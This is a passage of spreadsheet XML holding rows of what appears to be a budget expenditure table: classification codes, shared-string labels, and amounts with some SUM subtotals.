    <row r="560" ht="17.1" customHeight="1" spans="1:3">
      <c r="A560" s="705">
        <v>2080103</v>
      </c>
      <c r="B560" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C560" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="561" ht="17.1" customHeight="1" spans="1:3">
      <c r="A561" s="705">
        <v>2080104</v>
      </c>
      <c r="B561" s="705" t="s">
        <v>1333</v>
      </c>
      <c r="C561" s="707">
        <v>5</v>
      </c>
    </row>
    <row r="562" ht="17.1" customHeight="1" spans="1:3">
      <c r="A562" s="705">
        <v>2080105</v>
      </c>
      <c r="B562" s="705" t="s">
        <v>1334</v>
      </c>
      <c r="C562" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="563" ht="17.1" customHeight="1" spans="1:3">
      <c r="A563" s="705">
        <v>2080106</v>
      </c>
      <c r="B563" s="705" t="s">
        <v>1335</v>
      </c>
      <c r="C563" s="707">
        <v>1</v>
      </c>
    </row>
    <row r="564" ht="17.1" customHeight="1" spans="1:3">
      <c r="A564" s="705">
        <v>2080107</v>
      </c>
      <c r="B564" s="705" t="s">
        <v>1336</v>
      </c>
      <c r="C564" s="707">
        <v>75</v>
      </c>
    </row>
    <row r="565" ht="17.1" customHeight="1" spans="1:3">
      <c r="A565" s="705">
        <v>2080108</v>
      </c>
      <c r="B565" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C565" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="566" ht="17.1" customHeight="1" spans="1:3">
      <c r="A566" s="705">
        <v>2080109</v>
      </c>
      <c r="B566" s="705" t="s">
        <v>1337</v>
      </c>
      <c r="C566" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="567" ht="17.1" customHeight="1" spans="1:3">
      <c r="A567" s="705">
        <v>2080110</v>
      </c>
      <c r="B567" s="705" t="s">
        <v>1338</v>
      </c>
      <c r="C567" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="568" ht="17.1" customHeight="1" spans="1:3">
      <c r="A568" s="705">
        <v>2080111</v>
      </c>
      <c r="B568" s="705" t="s">
        <v>1339</v>
      </c>
      <c r="C568" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="569" ht="17.1" customHeight="1" spans="1:3">
      <c r="A569" s="705">
        <v>2080112</v>
      </c>
      <c r="B569" s="705" t="s">
        <v>1340</v>
      </c>
      <c r="C569" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="570" ht="17.1" customHeight="1" spans="1:3">
      <c r="A570" s="705">
        <v>2080113</v>
      </c>
      <c r="B570" s="705" t="s">
        <v>1341</v>
      </c>
      <c r="C570" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="571" ht="17.1" customHeight="1" spans="1:3">
      <c r="A571" s="705">
        <v>2080114</v>
      </c>
      <c r="B571" s="705" t="s">
        <v>1342</v>
      </c>
      <c r="C571" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="572" ht="17.1" customHeight="1" spans="1:3">
      <c r="A572" s="705">
        <v>2080115</v>
      </c>
      <c r="B572" s="705" t="s">
        <v>1343</v>
      </c>
      <c r="C572" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="573" ht="17.1" customHeight="1" spans="1:3">
      <c r="A573" s="705">
        <v>2080116</v>
      </c>
      <c r="B573" s="705" t="s">
        <v>1344</v>
      </c>
      <c r="C573" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="574" ht="17.1" customHeight="1" spans="1:3">
      <c r="A574" s="705">
        <v>2080150</v>
      </c>
      <c r="B574" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C574" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="575" ht="17.1" customHeight="1" spans="1:3">
      <c r="A575" s="705">
        <v>2080199</v>
      </c>
      <c r="B575" s="705" t="s">
        <v>1345</v>
      </c>
      <c r="C575" s="707">
        <v>1056</v>
      </c>
    </row>
    <row r="576" ht="17.1" customHeight="1" spans="1:3">
      <c r="A576" s="705">
        <v>20802</v>
      </c>
      <c r="B576" s="706" t="s">
        <v>1346</v>
      </c>
      <c r="C576" s="269">
        <f>SUM(C577:C584)</f>
        <v>789</v>
      </c>
    </row>
    <row r="577" ht="17.1" customHeight="1" spans="1:3">
      <c r="A577" s="705">
        <v>2080201</v>
      </c>
      <c r="B577" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C577" s="707">
        <v>549</v>
      </c>
    </row>
    <row r="578" ht="17.1" customHeight="1" spans="1:3">
      <c r="A578" s="705">
        <v>2080202</v>
      </c>
      <c r="B578" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C578" s="707">
        <v>13</v>
      </c>
    </row>
    <row r="579" ht="17.1" customHeight="1" spans="1:3">
      <c r="A579" s="705">
        <v>2080203</v>
      </c>
      <c r="B579" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C579" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="580" ht="17.1" customHeight="1" spans="1:3">
      <c r="A580" s="705">
        <v>2080206</v>
      </c>
      <c r="B580" s="705" t="s">
        <v>1347</v>
      </c>
      <c r="C580" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="581" ht="17.1" customHeight="1" spans="1:3">
      <c r="A581" s="705">
        <v>2080207</v>
      </c>
      <c r="B581" s="705" t="s">
        <v>1348</v>
      </c>
      <c r="C581" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="582" ht="17.1" customHeight="1" spans="1:3">
      <c r="A582" s="705">
        <v>2080208</v>
      </c>
      <c r="B582" s="705" t="s">
        <v>1349</v>
      </c>
      <c r="C582" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="583" ht="17.1" customHeight="1" spans="1:3">
      <c r="A583" s="705">
        <v>2080209</v>
      </c>
      <c r="B583" s="709" t="s">
        <v>1350</v>
      </c>
      <c r="C583" s="707">
        <v>181</v>
      </c>
    </row>
    <row r="584" ht="17.1" customHeight="1" spans="1:3">
      <c r="A584" s="705">
        <v>2080299</v>
      </c>
      <c r="B584" s="705" t="s">
        <v>1351</v>
      </c>
      <c r="C584" s="707">
        <v>46</v>
      </c>
    </row>
    <row r="585" ht="17.1" customHeight="1" spans="1:3">
      <c r="A585" s="705">
        <v>20804</v>
      </c>
      <c r="B585" s="706" t="s">
        <v>1352</v>
      </c>
      <c r="C585" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="586" ht="17.1" customHeight="1" spans="1:3">
      <c r="A586" s="705">
        <v>2080402</v>
      </c>
      <c r="B586" s="705" t="s">
        <v>1353</v>
      </c>
      <c r="C586" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="587" ht="17.1" customHeight="1" spans="1:3">
      <c r="A587" s="705">
        <v>20805</v>
      </c>
      <c r="B587" s="706" t="s">
        <v>1354</v>
      </c>
      <c r="C587" s="269">
        <f>SUM(C588:C595)</f>
        <v>43505</v>
      </c>
    </row>
    <row r="588" ht="17.1" customHeight="1" spans="1:3">
      <c r="A588" s="705">
        <v>2080501</v>
      </c>
      <c r="B588" s="705" t="s">
        <v>1355</v>
      </c>
      <c r="C588" s="707">
        <v>2985</v>
      </c>
    </row>
    <row r="589" ht="17.1" customHeight="1" spans="1:3">
      <c r="A589" s="705">
        <v>2080502</v>
      </c>
      <c r="B589" s="705" t="s">
        <v>1356</v>
      </c>
      <c r="C589" s="707">
        <v>4284</v>
      </c>
    </row>
    <row r="590" ht="17.1" customHeight="1" spans="1:3">
      <c r="A590" s="705">
        <v>2080503</v>
      </c>
      <c r="B590" s="705" t="s">
        <v>1357</v>
      </c>
      <c r="C590" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="591" ht="17.1" customHeight="1" spans="1:3">
      <c r="A591" s="705">
        <v>2080505</v>
      </c>
      <c r="B591" s="705" t="s">
        <v>1358</v>
      </c>
      <c r="C591" s="707">
        <v>7660</v>
      </c>
    </row>
    <row r="592" ht="17.1" customHeight="1" spans="1:3">
      <c r="A592" s="705">
        <v>2080506</v>
      </c>
      <c r="B592" s="705" t="s">
        <v>1359</v>
      </c>
      <c r="C592" s="707">
        <v>359</v>
      </c>
    </row>
    <row r="593" ht="17.1" customHeight="1" spans="1:3">
      <c r="A593" s="705">
        <v>2080507</v>
      </c>
      <c r="B593" s="705" t="s">
        <v>1360</v>
      </c>
      <c r="C593" s="707">
        <v>27650</v>
      </c>
    </row>
    <row r="594" ht="17.1" customHeight="1" spans="1:3">
      <c r="A594" s="705">
        <v>2080508</v>
      </c>
      <c r="B594" s="705" t="s">
        <v>1361</v>
      </c>
      <c r="C594" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="595" ht="17.1" customHeight="1" spans="1:3">
      <c r="A595" s="705">
        <v>2080599</v>
      </c>
      <c r="B595" s="705" t="s">
        <v>1362</v>
      </c>
      <c r="C595" s="707">
        <v>567</v>
      </c>
    </row>
    <row r="596" ht="17.1" customHeight="1" spans="1:3">
      <c r="A596" s="705">
        <v>20806</v>
      </c>
      <c r="B596" s="706" t="s">
        <v>1363</v>
      </c>
      <c r="C596" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="597" ht="17.1" customHeight="1" spans="1:3">
      <c r="A597" s="705">
        <v>2080601</v>
      </c>
      <c r="B597" s="705" t="s">
        <v>1364</v>
      </c>
      <c r="C597" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="598" ht="17.1" customHeight="1" spans="1:3">
      <c r="A598" s="705">
        <v>2080602</v>
      </c>
      <c r="B598" s="705" t="s">
        <v>1365</v>
      </c>
      <c r="C598" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="599" ht="17.1" customHeight="1" spans="1:3">
      <c r="A599" s="705">
        <v>2080699</v>
      </c>
      <c r="B599" s="705" t="s">
        <v>1366</v>
      </c>
      <c r="C599" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="600" ht="17.1" customHeight="1" spans="1:3">
      <c r="A600" s="705">
        <v>20807</v>
      </c>
      <c r="B600" s="706" t="s">
        <v>1367</v>
      </c>
      <c r="C600" s="269">
        <f>SUM(C601:C609)</f>
        <v>3793</v>
      </c>
    </row>
    <row r="601" ht="17.1" customHeight="1" spans="1:3">
      <c r="A601" s="705">
        <v>2080701</v>
      </c>
      <c r="B601" s="705" t="s">
        <v>1368</v>
      </c>
      <c r="C601" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="602" ht="17.1" customHeight="1" spans="1:3">
      <c r="A602" s="705">
        <v>2080702</v>
      </c>
      <c r="B602" s="705" t="s">
        <v>1369</v>
      </c>
      <c r="C602" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="603" ht="17.1" customHeight="1" spans="1:3">
      <c r="A603" s="705">
        <v>2080704</v>
      </c>
      <c r="B603" s="705" t="s">
        <v>1370</v>
      </c>
      <c r="C603" s="707">
        <v>36</v>
      </c>
    </row>
    <row r="604" ht="17.1" customHeight="1" spans="1:3">
      <c r="A604" s="705">
        <v>2080705</v>
      </c>
      <c r="B604" s="705" t="s">
        <v>1371</v>
      </c>
      <c r="C604" s="707">
        <v>3112</v>
      </c>
    </row>
    <row r="605" ht="17.1" customHeight="1" spans="1:3">
      <c r="A605" s="705">
        <v>2080709</v>
      </c>
      <c r="B605" s="705" t="s">
        <v>1372</v>
      </c>
      <c r="C605" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="606" ht="17.1" customHeight="1" spans="1:3">
      <c r="A606" s="705">
        <v>2080711</v>
      </c>
      <c r="B606" s="705" t="s">
        <v>1373</v>
      </c>
      <c r="C606" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="607" ht="17.1" customHeight="1" spans="1:3">
      <c r="A607" s="705">
        <v>2080712</v>
      </c>
      <c r="B607" s="705" t="s">
        <v>1374</v>
      </c>
      <c r="C607" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="608" ht="17.1" customHeight="1" spans="1:3">
      <c r="A608" s="705">
        <v>2080713</v>
      </c>
      <c r="B608" s="705" t="s">
        <v>1375</v>
      </c>
      <c r="C608" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="609" ht="17.1" customHeight="1" spans="1:3">
      <c r="A609" s="705">
        <v>2080799</v>
      </c>
      <c r="B609" s="705" t="s">
        <v>1376</v>
      </c>
      <c r="C609" s="707">
        <v>645</v>
      </c>
    </row>
    <row r="610" ht="17.1" customHeight="1" spans="1:3">
      <c r="A610" s="705">
        <v>20808</v>
      </c>
      <c r="B610" s="706" t="s">
        <v>1377</v>
      </c>
      <c r="C610" s="269">
        <f>SUM(C611:C618)</f>
        <v>7455</v>
      </c>
    </row>
    <row r="611" ht="17.1" customHeight="1" spans="1:3">
      <c r="A611" s="705">
        <v>2080801</v>
      </c>
      <c r="B611" s="705" t="s">
        <v>1378</v>
      </c>
      <c r="C611" s="707">
        <v>286</v>
      </c>
    </row>
    <row r="612" ht="17.1" customHeight="1" spans="1:3">
      <c r="A612" s="705">
        <v>2080802</v>
      </c>
      <c r="B612" s="705" t="s">
        <v>1379</v>
      </c>
      <c r="C612" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="613" ht="17.1" customHeight="1" spans="1:3">
      <c r="A613" s="705">
        <v>2080803</v>
      </c>
      <c r="B613" s="705" t="s">
        <v>1380</v>
      </c>
      <c r="C613" s="707">
        <v>5900</v>
      </c>
    </row>
    <row r="614" ht="17.1" customHeight="1" spans="1:3">
      <c r="A614" s="705">
        <v>2080805</v>
      </c>
      <c r="B614" s="705" t="s">
        <v>1381</v>
      </c>
      <c r="C614" s="707">
        <v>1000</v>
      </c>
    </row>
    <row r="615" ht="17.1" customHeight="1" spans="1:3">
      <c r="A615" s="705">
        <v>2080806</v>
      </c>
      <c r="B615" s="705" t="s">
        <v>1382</v>
      </c>
      <c r="C615" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="616" ht="17.1" customHeight="1" spans="1:3">
      <c r="A616" s="705">
        <v>2080807</v>
      </c>
      <c r="B616" s="705" t="s">
        <v>1383</v>
      </c>
      <c r="C616" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="617" ht="17.1" customHeight="1" spans="1:3">
      <c r="A617" s="705">
        <v>2080808</v>
      </c>
      <c r="B617" s="705" t="s">
        <v>1384</v>
      </c>
      <c r="C617" s="707">
        <v>80</v>
      </c>
    </row>
    <row r="618" ht="17.1" customHeight="1" spans="1:3">
      <c r="A618" s="705">
        <v>2080899</v>
      </c>
      <c r="B618" s="705" t="s">
        <v>1385</v>
      </c>
      <c r="C618" s="707">
        <v>189</v>
      </c>
    </row>
    <row r="619" ht="17.1" customHeight="1" spans="1:3">
      <c r="A619" s="705">
        <v>20809</v>
      </c>
      <c r="B619" s="706" t="s">
        <v>1386</v>
      </c>
      <c r="C619" s="269">
        <f>SUM(C620:C625)</f>
        <v>907</v>
      </c>
    </row>
    <row r="620" ht="17.1" customHeight="1" spans="1:3">
      <c r="A620" s="705">
        <v>2080901</v>
      </c>
      <c r="B620" s="705" t="s">
        <v>1387</v>
      </c>
      <c r="C620" s="707">
        <v>445</v>
      </c>
    </row>
    <row r="621" ht="17.1" customHeight="1" spans="1:3">
      <c r="A621" s="705">
        <v>2080902</v>
      </c>
      <c r="B621" s="705" t="s">
        <v>1388</v>
      </c>
      <c r="C621" s="707">
        <v>230</v>
      </c>
    </row>
    <row r="622" ht="17.1" customHeight="1" spans="1:3">
      <c r="A622" s="705">
        <v>2080903</v>
      </c>
      <c r="B622" s="705" t="s">
        <v>1389</v>
      </c>
      <c r="C622" s="707">
        <v>21</v>
      </c>
    </row>
    <row r="623" ht="17.1" customHeight="1" spans="1:3">
      <c r="A623" s="705">
        <v>2080904</v>
      </c>
      <c r="B623" s="705" t="s">
        <v>1390</v>
      </c>
      <c r="C623" s="707">
        <v>18</v>
      </c>
    </row>
    <row r="624" ht="17.1" customHeight="1" spans="1:3">
      <c r="A624" s="705">
        <v>2080905</v>
      </c>
      <c r="B624" s="705" t="s">
        <v>1391</v>
      </c>
      <c r="C624" s="707">
        <v>175</v>
      </c>
    </row>
    <row r="625" ht="17.1" customHeight="1" spans="1:3">
      <c r="A625" s="705">
        <v>2080999</v>
      </c>
      <c r="B625" s="705" t="s">
        <v>1392</v>
      </c>
      <c r="C625" s="707">
        <v>18</v>
      </c>
    </row>
    <row r="626" ht="17.1" customHeight="1" spans="1:3">
      <c r="A626" s="705">
        <v>20810</v>
      </c>
      <c r="B626" s="706" t="s">
        <v>1393</v>
      </c>
      <c r="C626" s="269">
        <f>SUM(C627:C633)</f>
        <v>3797</v>
      </c>
    </row>
    <row r="627" ht="17.1" customHeight="1" spans="1:3">
      <c r="A627" s="705">
        <v>2081001</v>
      </c>
      <c r="B627" s="705" t="s">
        <v>1394</v>
      </c>
      <c r="C627" s="707">
        <v>438</v>
      </c>
    </row>
    <row r="628" ht="17.1" customHeight="1" spans="1:3">
      <c r="A628" s="705">
        <v>2081002</v>
      </c>
      <c r="B628" s="705" t="s">
        <v>1395</v>
      </c>
      <c r="C628" s="707">
        <v>1830</v>
      </c>
    </row>
    <row r="629" ht="17.1" customHeight="1" spans="1:3">
      <c r="A629" s="705">
        <v>2081003</v>
      </c>
      <c r="B629" s="705" t="s">
        <v>1396</v>
      </c>
      <c r="C629" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="630" ht="17.1" customHeight="1" spans="1:3">
      <c r="A630" s="705">
        <v>2081004</v>
      </c>
      <c r="B630" s="705" t="s">
        <v>1397</v>
      </c>
      <c r="C630" s="707">
        <v>1445</v>
      </c>
    </row>
    <row r="631" ht="17.1" customHeight="1" spans="1:3">
      <c r="A631" s="705">
        <v>2081005</v>
      </c>
      <c r="B631" s="705" t="s">
        <v>1398</v>
      </c>
      <c r="C631" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="632" ht="17.1" customHeight="1" spans="1:3">
      <c r="A632" s="705">
        <v>2081006</v>
      </c>
      <c r="B632" s="705" t="s">
        <v>1399</v>
      </c>
      <c r="C632" s="707">
        <v>84</v>
      </c>
    </row>
    <row r="633" ht="17.1" customHeight="1" spans="1:3">
      <c r="A633" s="705">
        <v>2081099</v>
      </c>
      <c r="B633" s="705" t="s">
        <v>1400</v>
      </c>
      <c r="C633" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="634" ht="17.1" customHeight="1" spans="1:3">
      <c r="A634" s="705">
        <v>20811</v>
      </c>
      <c r="B634" s="706" t="s">
        <v>1401</v>
      </c>
      <c r="C634" s="269">
        <f>SUM(C635:C642)</f>
        <v>2483</v>
      </c>
    </row>
    <row r="635" ht="17.1" customHeight="1" spans="1:3">
      <c r="A635" s="705">
        <v>2081101</v>
      </c>
      <c r="B635" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C635" s="707">
        <v>183</v>
      </c>
    </row>
    <row r="636" ht="17.1" customHeight="1" spans="1:3">
      <c r="A636" s="705">
        <v>2081102</v>
      </c>
      <c r="B636" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C636" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="637" ht="17.1" customHeight="1" spans="1:3">
      <c r="A637" s="705">
        <v>2081103</v>
      </c>
      <c r="B637" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C637" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="638" ht="17.1" customHeight="1" spans="1:3">
      <c r="A638" s="705">
        <v>2081104</v>
      </c>
      <c r="B638" s="705" t="s">
        <v>1402</v>
      </c>
      <c r="C638" s="707">
        <v>215</v>
      </c>
    </row>
    <row r="639" ht="17.1" customHeight="1" spans="1:3">
      <c r="A639" s="705">
        <v>2081105</v>
      </c>
      <c r="B639" s="705" t="s">
        <v>1403</v>
      </c>
      <c r="C639" s="707">
        <v>22</v>
      </c>
    </row>
    <row r="640" ht="17.1" customHeight="1" spans="1:3">
      <c r="A640" s="705">
        <v>2081106</v>
      </c>
      <c r="B640" s="705" t="s">
        <v>1404</v>
      </c>
      <c r="C640" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="641" ht="17.1" customHeight="1" spans="1:3">
      <c r="A641" s="705">
        <v>2081107</v>
      </c>
      <c r="B641" s="705" t="s">
        <v>1405</v>
      </c>
      <c r="C641" s="707">
        <v>1855</v>
      </c>
    </row>
    <row r="642" ht="17.1" customHeight="1" spans="1:3">
      <c r="A642" s="705">
        <v>2081199</v>
      </c>
      <c r="B642" s="705" t="s">
        <v>1406</v>
      </c>
      <c r="C642" s="707">
        <v>208</v>
      </c>
    </row>
    <row r="643" ht="17.1" customHeight="1" spans="1:3">
      <c r="A643" s="705">
        <v>20816</v>
      </c>
      <c r="B643" s="706" t="s">
        <v>1407</v>
      </c>
      <c r="C643" s="269">
        <v>96</v>
      </c>
    </row>
    <row r="644" ht="17.1" customHeight="1" spans="1:3">
      <c r="A644" s="705">
        <v>2081601</v>
      </c>
      <c r="B644" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C644" s="707">
        <v>96</v>
      </c>
    </row>
    <row r="645" ht="17.1" customHeight="1" spans="1:3">
      <c r="A645" s="705">
        <v>2081602</v>
      </c>
      <c r="B645" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C645" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="646" ht="17.1" customHeight="1" spans="1:3">
      <c r="A646" s="705">
        <v>2081603</v>
      </c>
      <c r="B646" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C646" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="647" ht="17.1" customHeight="1" spans="1:3">
      <c r="A647" s="705">
        <v>2081699</v>
      </c>
      <c r="B647" s="705" t="s">
        <v>1408</v>
      </c>
      <c r="C647" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="648" ht="17.1" customHeight="1" spans="1:3">
      <c r="A648" s="705">
        <v>20819</v>
      </c>
      <c r="B648" s="706" t="s">
        <v>1409</v>
      </c>
      <c r="C648" s="269">
        <f>SUM(C649:C650)</f>
        <v>6830</v>
      </c>
    </row>
    <row r="649" ht="17.1" customHeight="1" spans="1:3">
      <c r="A649" s="705">
        <v>2081901</v>
      </c>
      <c r="B649" s="705" t="s">
        <v>1410</v>
      </c>
      <c r="C649" s="707">
        <v>180</v>
      </c>
    </row>
    <row r="650" ht="17.1" customHeight="1" spans="1:3">
      <c r="A650" s="705">
        <v>2081902</v>
      </c>
      <c r="B650" s="705" t="s">
        <v>1411</v>
      </c>
      <c r="C650" s="707">
        <v>6650</v>
      </c>
    </row>
    <row r="651" ht="17.1" customHeight="1" spans="1:3">
      <c r="A651" s="705">
        <v>20820</v>
      </c>
      <c r="B651" s="706" t="s">
        <v>1412</v>
      </c>
      <c r="C651" s="269">
        <v>1009</v>
      </c>
    </row>
    <row r="652" ht="17.1" customHeight="1" spans="1:3">
      <c r="A652" s="705">
        <v>2082001</v>
      </c>
      <c r="B652" s="705" t="s">
        <v>1413</v>
      </c>
      <c r="C652" s="707">
        <v>1009</v>
      </c>
    </row>
    <row r="653" ht="17.1" customHeight="1" spans="1:3">
      <c r="A653" s="705">
        <v>2082002</v>
      </c>
      <c r="B653" s="705" t="s">
        <v>1414</v>
      </c>
      <c r="C653" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="654" ht="17.1" customHeight="1" spans="1:3">
      <c r="A654" s="705">
        <v>20821</v>
      </c>
      <c r="B654" s="706" t="s">
        <v>1415</v>
      </c>
      <c r="C654" s="269">
        <f>C655+C656</f>
        <v>3009</v>
      </c>
    </row>
    <row r="655" ht="17.1" customHeight="1" spans="1:3">
      <c r="A655" s="705">
        <v>2082101</v>
      </c>
      <c r="B655" s="705" t="s">
        <v>1416</v>
      </c>
      <c r="C655" s="707">
        <v>42</v>
      </c>
    </row>
    <row r="656" ht="17.1" customHeight="1" spans="1:3">
      <c r="A656" s="705">
        <v>2082102</v>
      </c>
      <c r="B656" s="705" t="s">
        <v>1417</v>
      </c>
      <c r="C656" s="707">
        <v>2967</v>
      </c>
    </row>
    <row r="657" ht="17.1" customHeight="1" spans="1:3">
      <c r="A657" s="705">
        <v>20824</v>
      </c>
      <c r="B657" s="706" t="s">
        <v>1418</v>
      </c>
      <c r="C657" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="658" ht="17.1" customHeight="1" spans="1:3">
      <c r="A658" s="705">
        <v>2082401</v>
      </c>
      <c r="B658" s="705" t="s">
        <v>1419</v>
      </c>
      <c r="C658" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="659" ht="17.1" customHeight="1" spans="1:3">
      <c r="A659" s="705">
        <v>2082402</v>
      </c>
      <c r="B659" s="705" t="s">
        <v>1420</v>
      </c>
      <c r="C659" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="660" ht="17.1" customHeight="1" spans="1:3">
      <c r="A660" s="705">
        <v>20825</v>
      </c>
      <c r="B660" s="706" t="s">
        <v>1421</v>
      </c>
      <c r="C660" s="269">
        <v>533</v>
      </c>
    </row>
    <row r="661" ht="17.1" customHeight="1" spans="1:3">
      <c r="A661" s="705">
        <v>2082501</v>
      </c>
      <c r="B661" s="705" t="s">
        <v>1422</v>
      </c>
      <c r="C661" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="662" ht="17.1" customHeight="1" spans="1:3">
      <c r="A662" s="705">
        <v>2082502</v>
      </c>
      <c r="B662" s="705" t="s">
        <v>1423</v>
      </c>
      <c r="C662" s="707">
        <v>533</v>
      </c>
    </row>
    <row r="663" ht="17.1" customHeight="1" spans="1:3">
      <c r="A663" s="705">
        <v>20826</v>
      </c>
      <c r="B663" s="706" t="s">
        <v>1424</v>
      </c>
      <c r="C663" s="269">
        <v>27440</v>
      </c>
    </row>
    <row r="664" ht="17.1" customHeight="1" spans="1:3">
      <c r="A664" s="705">
        <v>2082601</v>
      </c>
      <c r="B664" s="705" t="s">
        <v>1425</v>
      </c>
      <c r="C664" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="665" ht="17.1" customHeight="1" spans="1:3">
      <c r="A665" s="705">
        <v>2082602</v>
      </c>
      <c r="B665" s="705" t="s">
        <v>1426</v>
      </c>
      <c r="C665" s="707">
        <v>27440</v>
      </c>
    </row>
    <row r="666" ht="17.1" customHeight="1" spans="1:3">
      <c r="A666" s="705">
        <v>2082699</v>
      </c>
      <c r="B666" s="705" t="s">
        <v>1427</v>
      </c>
      <c r="C666" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="667" ht="17.1" customHeight="1" spans="1:3">
      <c r="A667" s="705">
        <v>20827</v>
      </c>
      <c r="B667" s="706" t="s">
        <v>1428</v>
      </c>
      <c r="C667" s="269">
        <v>6</v>
      </c>
    </row>
    <row r="668" ht="17.1" customHeight="1" spans="1:3">
      <c r="A668" s="705">
        <v>2082701</v>
      </c>
      <c r="B668" s="705" t="s">
        <v>1429</v>
      </c>
      <c r="C668" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="669" ht="17.1" customHeight="1" spans="1:3">
      <c r="A669" s="705">
        <v>2082702</v>
      </c>
      <c r="B669" s="705" t="s">
        <v>1430</v>
      </c>
      <c r="C669" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="670" ht="17.1" customHeight="1" spans="1:3">
      <c r="A670" s="705">
        <v>2082799</v>
      </c>
      <c r="B670" s="705" t="s">
        <v>1431</v>
      </c>
      <c r="C670" s="707">
        <v>6</v>
      </c>
    </row>
    <row r="671" ht="17.1" customHeight="1" spans="1:3">
      <c r="A671" s="705">
        <v>20828</v>
      </c>
      <c r="B671" s="706" t="s">
        <v>1432</v>
      </c>
      <c r="C671" s="269">
        <f>SUM(C672:C678)</f>
        <v>606</v>
      </c>
    </row>
    <row r="672" ht="17.1" customHeight="1" spans="1:3">
      <c r="A672" s="705">
        <v>2082801</v>
      </c>
      <c r="B672" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C672" s="707">
        <v>436</v>
      </c>
    </row>
    <row r="673" ht="17.1" customHeight="1" spans="1:3">
      <c r="A673" s="705">
        <v>2082802</v>
      </c>
      <c r="B673" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C673" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="674" ht="17.1" customHeight="1" spans="1:3">
      <c r="A674" s="705">
        <v>2082803</v>
      </c>
      <c r="B674" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C674" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="675" ht="17.1" customHeight="1" spans="1:3">
      <c r="A675" s="705">
        <v>2082804</v>
      </c>
      <c r="B675" s="705" t="s">
        <v>1433</v>
      </c>
      <c r="C675" s="707">
        <v>123</v>
      </c>
    </row>
    <row r="676" ht="17.1" customHeight="1" spans="1:3">
      <c r="A676" s="705">
        <v>2082805</v>
      </c>
      <c r="B676" s="705" t="s">
        <v>1434</v>
      </c>
      <c r="C676" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="677" ht="17.1" customHeight="1" spans="1:3">
      <c r="A677" s="705">
        <v>2082850</v>
      </c>
      <c r="B677" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C677" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="678" ht="17.1" customHeight="1" spans="1:3">
      <c r="A678" s="705">
        <v>2082899</v>
      </c>
      <c r="B678" s="705" t="s">
        <v>1435</v>
      </c>
      <c r="C678" s="707">
        <v>47</v>
      </c>
    </row>
    <row r="679" ht="17.1" customHeight="1" spans="1:3">
      <c r="A679" s="705">
        <v>20830</v>
      </c>
      <c r="B679" s="706" t="s">
        <v>1436</v>
      </c>
      <c r="C679" s="269">
        <f>C680+C681</f>
        <v>487</v>
      </c>
    </row>
    <row r="680" ht="17.1" customHeight="1" spans="1:3">
      <c r="A680" s="705">
        <v>2083001</v>
      </c>
      <c r="B680" s="705" t="s">
        <v>1437</v>
      </c>
      <c r="C680" s="707">
        <v>220</v>
      </c>
    </row>
    <row r="681" ht="17.1" customHeight="1" spans="1:3">
      <c r="A681" s="705">
        <v>2083099</v>
      </c>
